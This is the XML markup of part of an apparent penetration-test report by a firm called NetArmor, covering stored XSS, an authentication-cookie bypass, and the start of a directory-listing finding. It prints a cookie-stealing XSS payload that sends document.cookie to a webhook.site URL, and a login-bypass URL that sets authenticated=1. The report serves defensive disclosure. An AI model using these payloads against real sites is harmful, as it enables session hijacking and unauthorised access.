    <w:p w14:paraId="6E8AB67D" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="00D57E0F">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12948D2A" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="00D57E0F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Cross Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> was only found on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>production</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> server. The vulnerability was initially found after entering </w:t>
      </w:r>
      <w:r w:rsidRPr="00D57E0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;script&gt; alert(1) &lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the Subscribe now section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22485851" w14:textId="370F0986" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="00D57E0F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D57E0F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07E21C73" wp14:editId="7978383F">
            <wp:extent cx="3201228" cy="2418705"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="20320"/>
            <wp:docPr id="578780282" name="Picture 1" descr="A screenshot of a subscribe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80282" name="Picture 1" descr="A screenshot of a subscribe form&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3208313" cy="2424058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFBC216" w14:textId="713CCFF3" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="00D57E0F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 8</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Vulnerable text box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5B0C4C" w14:textId="5EB578DC" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="1ACDDFCD" w14:textId="21D38CD1" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="1D8F7EFF">
      <w:r>
        <w:t>When an authenticated employee clicks on the “Future Customer List” option, an Alert(1) pop up was successfully executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E346C4F" w14:textId="77777777" w:rsidR="00721CE5" w:rsidRDefault="00721CE5" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="5798C102" w14:textId="295DC5F2" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="00D57E0F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D57E0F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D7F8B17" wp14:editId="35365E2A">
            <wp:extent cx="3951738" cy="2673235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1867094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94497" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId28"/>
                    <a:srcRect t="5731" r="2799" b="28353"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3973279" cy="2687807"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591376C" w14:textId="3D52556D" w:rsidR="00D57E0F" w:rsidRPr="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="00D57E0F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 8</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Successful Alert(1) pop up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E48E8" w14:textId="77777777" w:rsidR="00D57E0F" w:rsidRDefault="00D57E0F" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="482260DF" w14:textId="7C4518A0" w:rsidR="00301B8C" w:rsidRDefault="00721CE5" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the successful exploitation of XSS, a webhook can be set up for a session hijacking attack. NetArmor owns the domain </w:t>
      </w:r>
      <w:r w:rsidRPr="00721CE5">
        <w:t>https://webhook.site/ae90901c-d002-4818-9fb3-2bccb23a0434</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Any requests made to that domain, can be viewed by NetArmor.</w:t>
      </w:r>
      <w:r w:rsidR="00301B8C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> A payload of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A2D54" w14:textId="65B34BF8" w:rsidR="00D57E0F" w:rsidRPr="004B3047" w:rsidRDefault="004B3047" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B3047">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;img src=x onerror=this.src="https://webhook.site/ae90901c-d002-4818-9fb3-2bccb23a0434/?"+document.cookie;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was entered and the webhook recorded that the cookie for authenticated users was </w:t>
      </w:r>
      <w:r w:rsidRPr="004B3047">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authenticated=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8674EB" w14:textId="3D0980B1" w:rsidR="00D57E0F" w:rsidRDefault="004B3047" w:rsidP="004B3047">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004B3047">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="309AD294" wp14:editId="49298819">
            <wp:extent cx="4991794" cy="2814817"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="24130"/>
            <wp:docPr id="851515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5759" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5000576" cy="2819769"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44374B86" w14:textId="0C63DAAB" w:rsidR="004B3047" w:rsidRPr="00D57E0F" w:rsidRDefault="004B3047" w:rsidP="004B3047">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 8</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recovered Employee Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C3F087" w14:textId="77777777" w:rsidR="004B3047" w:rsidRDefault="004B3047" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367788F5" w14:textId="7EDDB73A" w:rsidR="005D382D" w:rsidRDefault="00B94233" w:rsidP="005D382D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc153834530"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="005D382D" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="005D382D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure Direct Object References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>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5D382D" w14:paraId="4FA5AC9C" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="935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Pr>
          <w:p w14:paraId="22CDE3B7" w14:textId="0AF01F8E" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>HIGH RISK (</w:t>
            </w:r>
            <w:r w:rsidR="000A151E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D382D" w14:paraId="636E20FC" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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21DBC14E" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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6937EA5" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D382D" w14:paraId="195BC2D0" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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12F4415C" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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F7C29C8" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D382D" w14:paraId="200357B3" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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704D6147" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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6399D814" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B483F1A" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="005D382D"/>
    <w:p w14:paraId="5DA99073" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="005D382D">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364CAC37" w14:textId="5124DCC3" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="005D382D">
      <w:r>
        <w:t xml:space="preserve">The authentication mechanism used to check for whether a user is authenticated or not is though the use of a single cookie, authenticated. The cookie is set either to 1 if the user is authenticated and 0 if the user is not. A </w:t>
      </w:r>
      <w:r w:rsidR="00866314">
        <w:t>regular user without any credentials, can easily modify the authenticated parameter in the cookie and URL to be 1 and log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C5F2E7" w14:textId="41A279FA" w:rsidR="00866314" w:rsidRDefault="00F12F69" w:rsidP="005D382D">
      <w:r>
        <w:t xml:space="preserve">If this URL is entered into the URL of the webpage, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>10.10.0.66/login.php?username=1&amp;password=1&amp;Login=Enter&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>authenticated=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, It will able </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>take the user to the employee.php page. Furthermore, if the authenticated cookie is changed to 1, the user will be able to see the customer.list file as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A35106" w14:textId="5F91D6BC" w:rsidR="00F12F69" w:rsidRDefault="00F12F69" w:rsidP="005D382D">
      <w:r w:rsidRPr="00F12F69">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E7D764" wp14:editId="58AF59D0">
            <wp:extent cx="5943600" cy="3664585"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12065"/>
            <wp:docPr id="125980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0979" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3664585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AAFB0A" w14:textId="7C9D284E" w:rsidR="00F12F69" w:rsidRDefault="00F12F69" w:rsidP="00F12F69">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Setting authenticated cookie to 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C3ECE3" w14:textId="77777777" w:rsidR="00F12F69" w:rsidRDefault="00F12F69" w:rsidP="005D382D"/>
    <w:p w14:paraId="4E7EDEC4" w14:textId="77777777" w:rsidR="005D382D" w:rsidRDefault="005D382D" w:rsidP="005D382D"/>
    <w:p w14:paraId="7E5D385F" w14:textId="0156F532" w:rsidR="00220DD3" w:rsidRDefault="00B94233" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc153834531"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="2E62A322" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Directory Listing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidR="2E62A322" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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220DD3" w14:paraId="507E023A" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9359"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61C00"/>
          </w:tcPr>
          <w:p w14:paraId="594894B6" w14:textId="70A9FE47" w:rsidR="00220DD3" w:rsidRDefault="2E62A322" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>HIGH RISK (</w:t>
            </w:r>
            <w:r w:rsidR="000A151E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="5617A94D" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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0D284B6E" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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5DE28510" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="385D9993" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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64C6DDCA" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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3C378106" w14:textId="705099BD" w:rsidR="00220DD3" w:rsidRDefault="57422D10" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="2215CB73" w14:textId="77777777" w:rsidTr="000A151E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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Pr>
          <w:p w14:paraId="79D9606F" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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Pr>
          <w:p w14:paraId="23557FD5" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="392AAFAD" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3"/>
